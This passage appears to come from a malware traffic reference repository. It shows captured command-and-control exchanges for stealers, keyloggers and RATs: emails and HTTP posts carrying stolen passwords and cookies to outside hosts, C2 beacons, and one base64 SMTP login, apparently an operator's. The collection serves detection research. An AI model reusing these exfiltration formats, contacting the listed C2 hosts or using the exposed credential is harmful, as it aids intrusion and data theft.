.K.z....P...Y..M[..d.2p..U....O=.|*4-....S;.b...I......1t.~Z..e.ETxk...r(u_g........a...?.y$t..LR.:..>...3j..gT .....DJH..N.MJD.eb...I...}.V^5a...\@.S..........4..u_...l$y....k*......|...D..Z .8S...i..z.9.&..5F.......A..V.c\.{..I...1|.W..td?...Y..... ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/orcus.png "Orcus RAT") #### Origin Keylogger ~~~ From: sp@globalfinancel.com To: new@globalfinancel.com Date: 17 Oct 2019 15:03:43 +0000 Subject: admin/USER-PC Recovered Accounts Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: quoted-printable Time: 10/17/2019 15:03:33
UserName: admin
ComputerName: USE= R-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Int= el(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 4095.61 MB
IP: 18= 5.117.118.92=0A
URL: https://www.facebook.com/
=0D=0AU= sername: honey@pot.com
=0D=0APassword: honeypass356
=0D=0AA= pplication: Chrome
=0D=0A
=0D=0AURL: 192.168.1.1
=0D=0A= Username: honey@pot.com
=0D=0APassword: honeypass356
=0D=0A= Application: Outlook
=0D=0A
=0D=0A From: sp@globalfinancel.com To: new@globalfinancel.com Date: 17 Oct 2019 15:03:43 +0000 Subject: admin/USER-PC Recovered Cookies Content-Type: multipart/mixed; boundary=--boundary_0_33ca7fc1-78dd-4797-bb1b-819697f17244 ----boundary_0_33ca7fc1-78dd-4797-bb1b-819697f17244 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: quoted-printable Time: 10/17/2019 15:03:34
UserName: admin
ComputerName: USE= R-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Int= el(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 4095.61 MB
IP: 18= 5.117.118.92=0A
----boundary_0_33ca7fc1-78dd-4797-bb1b-819697f17244 Content-Type: application/octet-stream; name=4dz3xb0p.hda.zip Content-Transfer-Encoding: base64 Content-Disposition: attachment UEsDBBQAAAgIAIRp/k5nVtI5VAoAAABwAAAjAAAANGR6M3hiMHAuaGRhL0Nocm9tZS9E ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/origin.png "Origin Keylogger") #### Oski Stealer ~~~ POST /main.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: gewe.tech Connection: Keep-Alive Cache-Control: no-cache --1BEF0A57BE110FD467A-- HTTP/1.1 200 OK Connection: Keep-Alive X-Powered-By: PHP/7.2.26 Content-Type: text/html; charset=UTF-8 Content-Length: 102 Content-Encoding: gzip Vary: Accept-Encoding Date: Wed, 26 Feb 2020 11:23:13 GMT Server: LiteSpeed 1;USERPROFILE\Downloads;*.dat,*.key,*.txt;1;LOCALAPPDATA\;*.dat,*.key,*.txt;1;APPDATA\;*.dat,*.key,*.txt;1;USERPROFILE\Documents;*.dat,*.key,*.txt;1;USERPROFILE\Desktop;*.dat,*.key,*.txt; POST / HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 60097 Host: gewe.tech Connection: Keep-Alive Cache-Control: no-cache --1BEF0A57BE110FD467A Content-Disposition: form-data; name="file"; filename="_4052981232.zip" Content-Type: zip PK.........ZZP..*.#...&..."...autofill/Google Chrome_Default.txtUT ..!UV^!UV^!UV^s.,*..K.M.tOL*.L....I...%..e....r..PK.........ZZP............-...autofill/Mozilla Firefox_qldyz51w.default.txtUT ..!UV^!UV^!UV^..PK.........ZZP................cc/Google Chrome_Default.txtUT ..!UV^!UV^!UV^..PK.........ZZP............!...cookies/Google Chrome_Default.txtUT ..!UV^!UV^!UV^..PK.........ZZP..).........,...cookies/Mozilla Firefox_qldyz51w.default.txtUT ..!UV^!UV^!UV^..KK.@...S.OI.{..YV.....5%.2.....vb...T..B.\]8........y..{.7....67.....\(..&C%:..F&.Ce.P5..k.#q.....b..?.`Y...kyW.Sv.B..Z.R=...[o..z^..uiR.-.eg..p.@g.....Y*..|...Q...cU..9R.J. )....r...!.... Y.<.4.Pg...5..4"........@..]a.t.1.*. *D..v<....._/..._ .......r......L"&.$C...x..PK.........ZZP8G.......... ...passwords.txtUT ..!UV^ UV^ UV^...w.RpIMK,.).. .w..Rp..O.IUp.(..M...... f....[.....%&.&..g.%....r........R+. .K@..\....P....bcS3^..(......*S.r..Tk}..2sr...2.R..+`..d..PK.........ZZP.dwtv...T.......screenshot.jpgUT ..&UV^&UV^&UV^..u\TQ.5.. .."8 .. ... .CJJHJ..R .#...C.t.Jww..t.{...}?....}...9...93..k.u]{....,.....$..... ......C....q........w0...X..a..=....S.....R...S>~BMJ............O... +..3.$(w.....E..M.........W...;....4...T\.4\..F...............B..q...=.A...* ...-4t.[.....~.-\t<*......b<..>. .~.Z...>.o......]L.G.D..t...L.\.<.|../$$..edU..54.^j...653..t|............._.a...Q.1.bSR.....Y.E.%.e...U.....[Z.......GF........W.................\........\...[h.0..BA}.6...N.~... ......|.@.B....K....7r..$....../ ye..]......?......`..._...D......s..7.....yFo.......S* ....z..z.%^.~..8.... ....&T<.s.<..s.2.y}[..L.....i...4..h..+.. b6.Z.....U,.z0Xn.........K8.]...m_4..@...R.....Z..W.N...k~....+.....|....; *...6W'.....1f.....Y....,.5>!...m...7 .R'.f.E.`.M.,k..< ua..W.D.+.Q.W .q......d...k. ...system.txtUT i...PK.........ZZP................_1.zipUT ..&UV^!UV^!UV^PK....................PK...........ZZP..*.#...&...". ....... .......autofill/Google Chrome_Default.txtUT...!UV^PK...........ZZP............-. ....... ...t...autofill/Mozilla Firefox_qldyz51w.default.txtUT...!UV^PK...........ZZP.............. ....... .......cc/Google Chrome_Default.txtUT...!UV^PK...........ZZP............!. ....... .......cookies/Google Chrome_Default.txtUT...!UV^PK...........ZZP..).........,. ....... ...q...cookies/Mozilla Firefox_qldyz51w.default.txtUT...!UV^PK...........ZZP8G.......... . ....... .......passwords.txtUT...!UV^PK...........ZZP.dwtv...T..... ....... .......screenshot.jpgUT...&UV^PK...........ZZP.pv.r... 2.. . ....... ...S...system.txtUT...&UV^PK...........ZZP.............. ....... ......._1.zipUT...&UV^PK...... . .....I..... --1BEF0A57BE110FD467A-- HTTP/1.1 200 OK Connection: Keep-Alive X-Powered-By: PHP/7.2.26 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Wed, 26 Feb 2020 11:23:19 GMT Server: LiteSpeed ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/oski1.png "Oski") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/oski2.png "Oski") #### Ostap ~~~ POST /angola/mabutu.php?pi=29h&tan=cezar&z=662343339&n=0&u=20&an=9468863238 HTTP/1.1 Connection: Keep-Alive Content-Type: text/plain; Charset=UTF-8 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 1034 Host: 185.180.199.91 Microsoft Windows 7 Professional 6.1.7601*Locale:0409 C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sent64.jse USER-PC*DELL*DELL*0 System Idle Process*null System*null smss.exe*null csrss.exe*null wininit.exe*null csrss.exe*null winlogon.exe*null services.exe*null lsass.exe*null lsm.exe*null svchost.exe*null svchost.exe*null svchost.exe*null svchost.exe*null svchost.exe*null svchost.exe*null svchost.exe*null spoolsv.exe*null svchost.exe*null svchost.exe*null svchost.exe*null dwm.exe*C:\Windows\system32\Dwm.exe explorer.exe*C:\Windows\Explorer.EXE taskhost.exe*C:\Windows\system32\taskhost.exe SearchIndexer.exe*null qemu-ga.exe*null audiodg.exe*null WmiPrvSE.exe*null SearchProtocolHost.exe*null windanr.exe*C:\Windows\system32\windanr.exe OSPPSVC.EXE*null wscript.exe*C:\Windows\system32\wscript.exe wscript.exe*C:\Windows\system32\wscript.exe SearchFilterHost.exe*null WINWORD.EXE*C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WmiPrvSE.exe*null ~~~ ~~~ https://51.83.206.98/1/1.php?g=m4&b=4a01758c&c=ACCOUNTDOMAIN@@LARRY-ACCOUNTIN@@Larry@@*172.16.0.2%3A%3A%5B00000001%5D%20Intel%28R%29%20Ethernet%20Connection%20I217-LM&233137 https://45.128.134.14/C821al/vc2Tmy.php?h=m2&j=4a01758c&l=ACCOUNTDOMAIN@@LARRY-ACCOUNTIN@@Larry@@*172.16.0.2%3A%3A%5B00000001%5D%20Intel%28R%29%20Ethernet%20Connection%20I217-LM&13742148 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ostap-1.png "Ostap") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ostap-2.png "Ostap") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ostap-3.png "Ostap") #### Ousaban (banker) ~~~ #PRINCIPAL##Convite##ConvitRC#<#>Windows 10 Pro<#>DESKTOP-JGLLJLD<#>Nao<#>Windows Defender#SocketMain#<#>723442#UploadFile##RECEBENDO#<#>DESKTOP-JGLLJLD#ON-LINE##strPingOk##ON-LINE##strPingOk##ON-LINE##strPingOk##PLUGIN#<#>Nao#ON-LINE##strPingOk##COMPLETOU#<#>DESKTOP-JGLLJLD ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ousaban.png "Ousaban") #### Parallax RAT ~~~ 00000000 04 c7 86 72 fd 82 d3 50 88 03 b3 9f bc 7f b1 f3 ...r...P ........ 00000010 2f 44 27 83 80 9d ab d2 22 72 ff 33 88 8f 85 17 /D'..... "r.3.... 00000020 fd af c9 1e 5e c9 68 88 70 a6 27 7e 6f 95 7b d5 ....^.h. p.'~o.{. 00000030 ed 48 fd 08 40 83 c2 36 c8 82 e4 50 6a f0 4e 9f .H..@..6 ...Pj.N. 00000040 8a 7f eb f3 42 44 64 83 c8 9d e1 d2 65 72 bc 33 ....BDd. ....er.3 00000050 fe 8e aa 17 b4 af 88 1e 16 c9 25 88 29 a6 6b 7e ........ ..%.).k~ 00000060 26 95 4e d5 db 48 cc 08 3e d7 f8 0c 44 6e ff 59 &.N..H.. >...Dn.Y 00000070 79 dc 64 86 8b c1 cd a6 64 c0 da 77 bf 95 77 dd y.d..... d..w..w. 00000080 7c a0 d5 f0 71 34 56 b2 80 d8 1e b6 89 22 cf 8b |...q4V. .....".. 00000090 55 e4 05 4b 7b 6d 07 ef 93 6d f2 f3 4d ee ee 23 U..K{m.. .m..M..# 000000A0 8f 26 b1 7d 98 34 ae e7 26 08 d4 e8 1d 28 21 2a .&.}.4.. &....(!* 000000B0 35 3b c6 0c 01 01 6c ed 54 a4 a0 2f a2 ef e0 1d 5;....l. T../.... 000000C0 ce 34 b7 55 f8 2f fb 23 e9 50 cf e2 3a 35 50 bb .4.U./.# .P..:5P. 000000D0 85 04 0a 91 c3 91 64 54 52 63 1f 8a 41 3a 25 d9 ......dT Rc..A:%. 000000E0 bf da af 3b ea 73 0b 9c 1f 58 02 f2 97 83 10 7b ...;.s.. .X.....{ 000000F0 96 4a 7a 57 8a 38 54 76 c9 fa 6a 41 25 8a 10 37 .JzW.8Tv ..jA%..7 00000100 03 52 d8 ca 85 2c 06 83 e3 ef 76 de 40 66 6c f0 .R...,.. ..v.@fl. 00000110 a2 68 39 9a ef 9e 7d 93 56 99 e9 2a .h9...}. V..* 00000000 04 c7 86 72 d6 82 d3 50 e5 a4 56 9f bc 7f b1 f3 ...r...P ..V..... 00000010 2f 44 27 83 80 9d ab d2 aa 2b f8 35 a0 8e 85 17 /D'..... .+.5.... 00000020 fd af c9 1e 5e c9 68 88 70 a6 27 7e 6f 95 7b d5 ....^.h. p.'~o.{. 00000030 ed 48 fd 08 .H.. 0000011C 04 c7 86 72 d7 82 d3 50 e5 a4 56 9f a0 89 20 f3 ...r...P ..V... . 0000012C 2f 44 27 83 80 9d ab d2 22 72 ff 33 02 8e 85 17 /D'..... "r.3.... 0000013C fd af c9 1e 5e c9 68 88 70 a6 27 7e 6f 95 7b d5 ....^.h. p.'~o.{. 0000014C ed 48 fd 08 fe 7c 59 c9 91 82 ba 50 4d f0 4b 9f .H...|Y. ...PM.K. 0000015C cf 7f c5 f3 5d 44 46 83 f4 9d c4 d2 50 72 c5 33 ....]DF. ....Pr.3 0000016C b4 8e c6 17 c7 af 95 1e 09 c9 01 88 1e a6 43 7e ........ ......C~ 0000017C 00 95 0c d5 9e 48 a1 08 7f d7 b1 0c 05 6e b9 59 .....H.. .....n.Y 0000018C 2b dc 09 86 b8 c1 00 59 c7 3f ee 1e bc f1 7c aa +......Y .?....|. 0000019C 21 80 87 d0 59 46 5c d4 e5 ab 92 20 19 b3 ae e7 !...YF\. ... .... 000001AC 75 e4 05 4b 7b 6d u..K{m 00000034 04 c7 86 72 d5 82 d3 50 23 f0 22 9f bc 7f b1 f3 ...r...P #."..... 00000044 2f 44 27 83 80 9d ab d2 22 72 ff 33 a0 8e 85 17 /D'..... "r.3.... 00000054 fd af c9 1e 5e c9 68 88 70 a6 27 7e 6f 95 7b d5 ....^.h. p.'~o.{. 00000064 ed 48 fd 08 .H.. ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/parallax.png "Parallax") #### ParasiteHTTP Loader ~~~ POST /index.php HTTP/1.1 Accept: */* Host: 80.233.134.242 Content-Type: application/x-www-form-urlencoded Connection: Close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Length: 280 Cache-Control: no-cache BF6472F6DC3=Pi5tSiBItP-2ZyuFJlr31Jp58O0HzR74v0b4l2HaoHH537FeTxgg-msYkTvX6SSJ8FswUtoTg4O86o2HyWec2zuU6VFzTwgaFYw_28nFRIqcJv8TqrV7SYgFKSpbqY8aZhEcHY982M_flvAHMCjsD8-fxezzV5BSBDBbfYb5WZvBrsbJVlPwXYFmETrm7CrWF5LwvEFhu1Ecp14ymv1xPoCG0vfqAv5tsUn0H7mA5R5g7HAo2c3_r9fuZUtw9CKD46G2JnBF-A== HTTP/1.1 200 OK Date: Tue, 28 May 2019 08:46:26 GMT Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.37 X-Powered-By: PHP/5.6.37 Set-Cookie: PHPSESSID=s3l4jdfsc8nkjghcevlshn3d67; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 416 Connection: close Content-Type: text/html; charset=utf-8 8jQG4riRhJFWMlJ9RTKeV7k45+I3REM8JjIIBZ2ttxzjDFxOX7VjxuypIrJn9cQ1ZMg6fvgWSSpto3sivUfvUCHWLzb2ljPhPugPTYb0KsgResnAIFl+aoqF5m9bCyBd6PMoRLdOdsuDW+E3wrb7ZNpApXlX2htDZRNhaqfST8eBE9Cvl7H0vyUzY+BfH5M4fvvt71DCRt2OP31tgu7aMMxM0mUWvBBZcNpeZzLRdMFd0Ea1u3oM+vLWrhFLYGuCWN6TPaqlEpw/9pgLUI8BhxUYFOJvyTRIFwXmlQPWMY6qg0/l+b5Ha+SYCnLtw8Uyqilil+OBM+KM5MT4C4l9vkXsv/ID9X8ZRr2l9cHzlW5J7sLVrGeH26KmBrjqBM3c4Ini4VTZZCr5KDrsRpi21NaheQLGLA== ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/parasitehttp.png "ParasiteHTTP Loader") #### Parasite Stealer aka Nexus ~~~ POST /gate.php HTTP/1.1 Content-Type: application/octet-stream; User-Agent: Client Host: 193.168.3.101 Content-Length: 1216583 Cache-Control: no-cache {846ee340-7039-11de-9d20-806e6f6e6963}~;^;Windows 7 Professional x64~;^;1.0~;^;0~;^;0~;^;0~;^;0~;^;0~;^;8~;^;PK.........q?P..&.?....... ...about.logUT ..m.4^m.4^m.4^.U]..@.}. ..>j6...?.J.Z7K!....0,....au..;.6u.....s...\?......J.CP...%....wz..........,#][F.p...]d...8X.`...[a... .....{.A.A.-.}....e....o]...H`.."......o3...&x+H.k......6x.tM....E.r..H.... Ls\f.....`.......].h\.....4.1..V.W%X.D.....3Y....9.u,ch......$i..Ps........J.uN.%...........y...8.QF7.... .!.........d.8...d;&.....................l.m7....w...1.3......r.. {.i.....}Lr5h.w..8eB._..w.LJp..9....+..]....T.6-..o..-f7.Q.z;...<..W.%.pA.......Q..d.o..""".-xD`)..F=..]..*..I.s0...-..P*.1.I..2N....!..\...5....IB..(O....u..Z......=....}.$.?;7Lt....)."/Y...o5.$..e....G'U....xrB..PK..........?P............ ...Browsers/UT ..`.5^`.5^`.5^PK.........q?PX.eS.P...P......Grabber.zipUT....... .......about.logUT...m.4^PK............?P............ . ..........Aw...Browsers/UT...`.5^PK...........q?PX.eS.P...P.... ....... .......Grabber.zipUT...n.4^PK...........q?P.ci..:...|.... ....... ....S..screen.jpegUT...m.4^PK.................... HTTP/1.1 200 OK Date: Fri, 31 Jan 2020 21:13:48 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/parasite1.png "Parasite stealer") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/parasite2.png "Parasite stealer") #### Phoenix Keylogger ~~~ 220 us2.outbound.mailhostbox.com ESMTP Postfix EHLO User-PC 250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN AUTH login dGhiQHRiaC10dy5jb20= 334 UGFzc3dvcmQ6 d2Fzc29kZWRvbjIy 235 2.7.0 Authentication successful MAIL FROM: 250 2.1.0 Ok RCPT TO: 250 2.1.5 Ok DATA 354 End data with . MIME-Version: 1.0 From: thb@tbh-tw.com To: thb@tbh-tw.com Date: 1 Nov 2019 14:38:03 +0000 Subject: PX | PSWD | Client Name: admin Content-Type: multipart/mixed; boundary=--boundary_0_b03405b1-500a-4ac8-8975-daed06a88bd0 ----boundary_0_b03405b1-500a-4ac8-8975-daed06a88bd0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable |------- Phoenix Keylogger - Passwords -------|=0D=0A+-----------= -- Client INFO -------------+=0D=0AIP: 81.17.242.238=0D=0AHWID: 1= 78BFBFF000506E3=0D=0AOwner Name: USER-PC=0D=0AFull OS Name: Micro= soft Windows 7 Professional =0D=0AOS Platform: Win32NTOS Version:= 6.1.7601.65536=0D=0ASystem Boot Mode: Normal=0D=0APhysical Memor= y: 3.25 GB Available Of 4.09 GB =0D=0AVirtual Memory: 1.85 GB A= vailable Of 2.04 GB =0D=0ADate: 11/1/2019 2:37:59 PM=0D=0A-------= ----------------------------------=0D=0A ----boundary_0_b03405b1-500a-4ac8-8975-daed06a88bd0 Content-Type: application/octet-stream; name="PXRecoveries | 11/1/2019 2:38:00 PM.txt" Content-Transfer-Encoding: base64 Content-Disposition: attachment 77u/PT09PT09PT09PT09Q2hyb21lPT09PT09PT09PT09PT0NCkhvc3Q6IGh0dHBzOi8v d3d3LmZhY2Vib29rLmNvbS8NClVzZXJuYW1lOiBob25leUBwb3QuY29tDQpQYXNzd29y ZDogaG9uZXlwYXNzMzU2DQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KID09 PT09PT09PT09PU91dExvb2s9PT09PT09PT09PT09PQ0KSG9zdDogMTkyLjE2OC4xLjEN ClVzZXJuYW1lOiBob25leUBwb3QuY29tDQpQYXNzd29yZDogaG9uZXlwYXNzMzU2DQo9 PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KIA== ----boundary_0_b03405b1-500a-4ac8-8975-daed06a88bd0-- . 250 2.0.0 Ok: queued as 7CDF2181E51 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/phoenix.png "Phoenix") #### Plugx ~~~ POST /update?wd=b0b9d49c HTTP/1.1 Accept: */* x-debug: 0 x-request: 0 x-content: 61456 x-storage: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; Host: 185.239.226.61:8080 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache ~~~ ~~~ ............?PEOJNOOBAAHDMKNGELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com.................?JJIOHDOBJEIEIBJJELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com.................?DBCGBLOBDMGFEIEMELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com.................?JJIOHDOBJEIEIBJJELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com................=.a.gtld-servers.net..nstld.verisign-grs..]..A......... :...Q.............?PEOJNOOBAAHDMKNGELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com................=.a.gtld-servers.net..nstld.verisign-grs..]..2......... :...Q.............?DBCGBLOBDMGFEIEMELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com................=.a.gtld-servers.net..nstld.verisign-grs..]..2......... :...Q. ~~~ ~~~ GET /EF003AAB6425775CD949B40C HTTP/1.1 Accept: */* Cookie: QhTbeUW+YzYYsZWz0PQvBvYIgo8= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: WOUDERFULU.impresstravel.ga Connection: Keep-Alive Cache-Control: no-cache HTTP/1.1 203 Server: nginx Date: Tue, 03 Sep 2019 14:37:02 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 660 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Server: ip-172-31-28-245 Set-Cookie: JSESSIONID=4618E9008B004BEE8FE5C81AB063A332; Path=/; HttpOnly ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/plugx-1.png "Plugx") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/plugx-2.png "PlugxDNS") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/plugx-3.png "Plugx") #### Pony Follow tcp stream, not http stream in wireshark ~~~ POST /mlu/forum.php HTTP/1.0 Host: spausence.com Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 369 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) ..|Rk.. ."6d0..)/.....Lo..l{;..:.NJT;.G..3P..n...{.i..eLX..j...K.N.......A. n.%.....r..&..........J.l.V..of..T..V$... .L...5....6F...9.)......(... .(O........*[z\.....N....=..4..];....L.W......Q...*.S....V. 7.4.L..v..oi...x..W7....{.....V)...:...1...R..V.......+...]m .......B...|D..t.Y.{..............{W.f.._i...i.!..d.C...r.......A.,.z....ta..m.. 5!...w+.....p....!0 HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Thu, 03 Oct 2019 17:17:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.4.45 .. .....f>k.X....... ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/pony.png "Pony") #### Pony Loader ~~~ POST /eng/gate.php HTTP/1.0 Host: www.jicago-jp.com Accept: */* Accept-Encoding: identity, *;q=0 Content-Length: 199 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) HTTP/1.1 200 OK Date: Wed, 09 Oct 2019 08:44:06 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 STATUS-IMPORT-OK ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/pony-loader.png "Pony Loader") #### Predator Pain Keylogger ~~~ From: pain@globalfinancel.com To: pain@globalfinancel.com Date: 17 Oct 2019 08:04:48 -0700 Subject: Predator Pain v13 - Server Ran - [XRWJAM272278424] Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable This is an email notifying you that XRWJAM272278424 has ran your = logger and emails should be sent to you shortly and at interval c= hoosen.=0D=0A =0D=0APredator Logger Details: =0D=0AServer Name: R= egSvcs.exe=0D=0AKeylogger Enabled: False=0D=0AClipboard-Logger En= abled: False=0D=0ATime Logs will be delivered: Every 60 minutes=0D=0A= =0D=0AStealers Enabled: True=0D=0ATime Log will be delivered: Av= erage 2 to 4 minutes=0D=0A =0D=0ALocal Date and Time: 10/17/2019 = 8:04:41 AM=0D=0AInstalled Language: en-US=0D=0AOperating System: = Microsoft Windows 7 Professional =0D=0AInternal IP Address: 192.1= 68.180.170=0D=0AExternal IP Address: =0D=0AInstalled Anti-Virus: = =0D=0AInstalled Firewall:=20 . 250 OK id=1iL7Kv-003iIX-Hl From: pain@globalfinancel.com To: pain@globalfinancel.com Date: 17 Oct 2019 08:05:04 -0700 Subject: Predator Pain v13|Stealer Log - [XRWJAM272278424] Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable ********************************= **************=0D=0A Operati= ng System Intel Recovery=0D=0A **= ********************************************=0D=0ACPU Name: XRWJA= M272278424=0D=0ALocal Date and Time: 10/17/2019 8:04:55 AM=0D=0AI= nstalled Language: en-US=0D=0ANet Version: 4.0.30319.42000=0D=0AO= perating System Platform: Win32NT=0D=0AOperating System Version: = 6.1.7601.65536=0D=0AOperating System: Microsoft Windows 7 Profess= ional =0D=0AInternal IP Address: 192.168.180.170=0D=0AExternal IP= Address: =0D=0AInstalled Anti-Virus: =0D=0AInstalled Firewall: =0D=0A= ********************************= **************=0D=0A WEB Bro= wser Password Recovery=0D=0A ****= ******************************************=0D=0A=0D=0A = *******************************************= ***=0D=0A Mail Messenger Passw= ord Recovery=0D=0A **************= ********************************=0D=0A=0D=0A = **********************************************=0D=0A = Internet Download Manager Reco= very=0D=0A **********************= ************************=0D=0A **= ********************************************=0D=0A = Jdownloader Password Recovery=0D=0A = ***************************************= ******* . 250 OK id=1iL7LE-003ina-5V ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/predatorpain.png "Predator Pain Keylogger") #### Predator the Thief ~~~ POST /api/check.get HTTP/1.1 Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.906.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Host: 95.215.205.56 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache HTTP/1.1 200 OK Date: Wed, 09 Oct 2019 20:05:42 GMT Server: Apache Set-Cookie: SID_INTERFICE=4c616d7fffe95fe8fc2f4f46d272c8a0412c1404; expires=Thu, 10-Oct-2019 20:05:42 GMT; Max-Age=86400; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 132 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: text/plain; charset=utf-8 nr8uEQylGUpuY0Qjyde/Fn3TGzRg6JFXvSXGhXxBL0Ls2eMYLaWSpJIvp6bRuCqmkclDgfyfYtc7/hQGxqKlJiPdCQ0v/JyN12lNiho7IjBLW3VB02orxGMXTr04WaAQz73q HTTP/1.1 200 OK Date: Wed, 09 Oct 2019 20:05:42 GMT Server: Apache Set-Cookie: SID_INTERFICE=4c616d7fffe95fe8fc2f4f46d272c8a0412c1404; expires=Thu, 10-Oct-2019 20:05:42 GMT; Max-Age=86400; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 